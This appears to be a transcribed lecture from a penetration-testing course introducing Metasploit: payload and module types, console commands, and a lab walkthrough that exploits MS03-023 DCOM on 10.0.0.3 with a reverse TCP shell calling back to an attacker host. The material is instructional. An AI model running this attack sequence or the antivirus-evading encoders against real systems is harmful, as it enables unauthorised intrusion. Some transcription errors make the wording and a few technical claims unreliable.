Metasploit. We already talked a little bit of Metasploit before, but now it's time to get into details. Metasploit comes pre-installed on Kali Linux, but it also can be installed on other Linux distros and also on Windows. But it's not recommended to disable because you need to disable your antivirus before installing it. Most of the exploits are and will be detected as viruses. So if you want Metasploit to work on Windows, you have to disable your security software, or much better is to install it on Linux, of course. As I said before, there are a few ways to use Metasploit, but we will focus mostly on msfconsole. This is how msfconsole looks like. Nothing interesting to be seen just yet. This is msfcli, and this is Metasploit web. It's actually a combination of msfconsole and the graphical user interface. The Hermitage is another way to use Metasploit, but if you know to use msfconsole, you will discover by yourself very easily how to use Hermitage. It's a graphical interface from Metasploit, but it's not always working as it should when it comes to complex attacks. Also, it's for lazy people mostly. Now, let's remember or get familiar with some technical terms. We might remember already about exploits and payloads. Those terms will be useful to understand how the Metasploit works and how to properly use it. We need to get familiar with those terms regardless of which interface we will use in Metasploit. We will understand them a little bit better in the following examples. Metasploit has 6 modules that are shown here. We'll use most of them during the labs. The payload module contains codes that we leave behind on a hacked system. Actually, this is the whole purpose of finding vulnerabilities and exploit them, to get to the point where we can put our code in the remote target. There are many types of payloads, such as listener, backdoors, or rootkits. We will understand them better on the labs we are going to apply them. Basically, those payloads are the instructions to be given to the hacked systems, either to listen for a connection from the attacker, either to connect back to the attacker, capture data from the keyboard, mouse, web, and so on. In the following slides, we'll talk about payload types. Inline payloads are those which contains the exploit and the full shell code. So once you send the payload to the target machine, the packet has all it's needed to execute the required tasks. It's very stable and contains practically everything is required. Unlike the inline payloads, the stage ones are made into separate pieces: stager and stage. Stager is a very small piece of code. Basically, it's a link to the stage that will be downloaded after the stager hits the target. Staged payload are useful when an attacker cannot send a big chunk of code all at once, so it will send the payload in small pieces. Meterpreter is the most advanced payload. Despite the other payloads, where you select at first what kind of action should be done by it, such as remote code execution, remote control, or other things, through Meterpreter you can have the options and access to a lot of features that can be used after the exploitation. Since these payloads reside in memory, it's very difficult for antiviruses to detect it and stop it. There are a lot of other payloads as well, described here, that can be used depending on the state and type of the target machine. Unfortunately, on this course there isn't enough time to discuss and use each of them in our lab, but are mentioned here so you can research on your own if you really need them in your penetration testing projects. Here we have more details about the stagers payloads and how they work. As I said, when it's not possible to send a big chunk of data at once, for instance the memory in which the payload will be stored is not big enough, this kind of payloads came to hand. Using the name convention described here, you can easily differentiate the types of payloads. Anyway, Metasploit will help you choose the best payload for your exploit depending on the target machine and specific vulnerability. You cannot use all types of payloads with all types of exploits, but Metasploit will show you which works with one. Using the show payloads command that we will discuss later, you can see available payloads. The inline payloads that we discussed earlier about are also called singles because, as you might already understand, those kind of payloads are a single chunk of code. They are not divided into stages and stage. They are generally more stable, but they might be too large for a vulnerable memory area on the victim system. As you might already know from the previous lectures and slides, exploits are shellcodes that takes advantage of a vulnerability in the system, and they are operating system, service, and application version dependent. So you cannot use, for instance, a Linux exploit for Windows or the other way around, and you cannot use a mail server exploit for a web server vulnerability. The post-exploitation module in Metasploit allow an attacker to perform certain tasks after the control of the target was obtained. For instance, after the exploitation, further information can be gathered, such as stored credentials for wireless network, operating system, or even stored password in the browsers. There is a list of exploits that can be used, and this list can be accessed using the show post command. This module of Metasploit called knobs, it's used when creating a buffer overflow exploit. These courses do not cover exploit development, so this was just briefly mentioned, but we'll not go more in detail about it. The auxiliary module covers numerous exploits used either for information gathering, fuzzing, scanning, or attacks such as denial of service. Sometimes we need to encode our payloads in order to bypass some types of protection, such as antiviruses. Metasploit comes with a number of encoders that will help us in this process. In Metasploit, it's easy to search for exploits. There are a few ways to filter the exploits by name, type, platform, and even the CVE number that we talked about earlier. Here we have some examples of how to use advanced search for exploits. You can also use the search keyword along with an application name without specifying all the other details such as platform or CVE number. So it's very flexible. There are several commands in Metasploit you should get familiar with. Those commands will be used during the lab, so it's important for you to remember and understand them. Metasploit have a good help in place that can show you in case you forget the syntax and role for each of those commands. Show command. As the name suggests, it is used to view the list of modules, payloads, and exploits. When you select a certain exploit, we can use show option to view the full information required so that specific exploit to work. The command is context sensitive, meaning that if you type show payloads after an exploit is selected, it will show you just those payloads that will work with that specific exploit. So this comes very handy for beginners and not only. We also have the help command that will show us the full list of commands that will work on a specific step of exploitation. This is also context sensitive. Using info command, you can see the full details of a certain selected exploit, including the author, CVE number, target application, and or platform that is intended to be used for. After selecting an exploit using the use command that we will discuss in the later slides, we must input some specific options for the exploit to work. This is done by using the set command. In this way, we can set the remote host to be attacked, remote port, remote user and password and so on, depending on the selected exploit. The back command is used to return to a previous module. For instance, if you selected an exploit and you don't want to use it any longer, you can use always the back command and select another. In order to select an exploit to be used, you must use the use keyword to load it into our memory and further use it. The use keyword must be followed by the complete path and name of the exploit as it's shown after the search command. You have here an example of how to load the OpenSSL Heartbleed SSL exploit. The natural step into attacking a machine is to search for an exploit, load the proper exploit, use the show command to see the required information to be inputted, use the set command to select that information, to select payload to be executed after exploitation, and other required variables. After all those information are inserted, the exploit or run keyword will begin the exploitation process. After a successful exploitation, a session is started between the attacker and the target machine. This section can be backgrounded to continue working on other machines or to select another post-exploitation module. In order to show the full list of active sessions, you can use the session command -L. The output will be shown as in the print screen. You can select the desired session by typing session -I and the ID number. Finally, you can use the exit command to return to the Linux regular console. So let's put together a full attack using Metasploit. Let's consider for this example that we already discovered the vulnerability for this system. We can read more about the found vulnerability in the provided link. The IP of the target machine is 10.0.0.3. The first step is to open a Metasploit console. From a normal Linux console, input the msfconsole command. Then search an exploit for the discovered vulnerability. The name of the vulnerability, as it's provided by NSU scanner, for instance, it's ms03-023 dcom. So we'll use the search dcom to find an exploit. There are a few results found, but reading the description we can find which one fits exactly our vulnerability, and this would be the number 2 in the search result from our print screen. The next step is to load or select the exploit so we can further configure it and then use it. This should be done as is shown using the use command followed by the full path as shown in the show result. If successful, no output will be shown, but the context will be changed and the name of the exploit will be shown before the greater than sign as in the image. So now we know what exploit we have selected. As I said before, the show command is context related. So now if we type show options, we can see the required variables to be inserted in order for this exploit to work. In this case, the remote host and remote port are needed. The 135 port is already selected as remote port since this is the default port for this vulnerable service. So now we must select the remote host using the set command as shown. The syntax is set, followed by the name of the variable, in this case host, written in capital letters, followed by the remote IP 10.0.0 payload.3. Now we should select the payload to be executed after exploitation. We can see the full compatible list of payload using the show payloads command. We select a compatible payload using the same set command as before. The full path should be written for the payload to work, as is shown in the search result. So the syntax will be set payload generic /shell _ reverse _ TCP. To check if all variables are properly defined, you can use the show options again. If they are okay, they should be shown as in the output as those underlined. We can see that one more variable is required in this case, and that be localhost or lhost variable. This would be the IP address to which the target should connect to after a successful exploitation. So let's set the local IP using the lhost command. The syntax is the same: set plus the name of the variable plus the name of the assigned value to be assigned to that variable. So set lhost 10.0.0.6, that would be the IP for the attacker's machine. Now we are good to go. So we type exploit or run and we wait. If the exploitation is successful, now we should have a Windows prompt of the remote Windows machine. We'll make this kind of exploitation using Metasploit during our lab. I hope you understand the role and also how the Metasploit works. If not, you can understand by practicing and playing it with it during the lab. Good luck and thank you.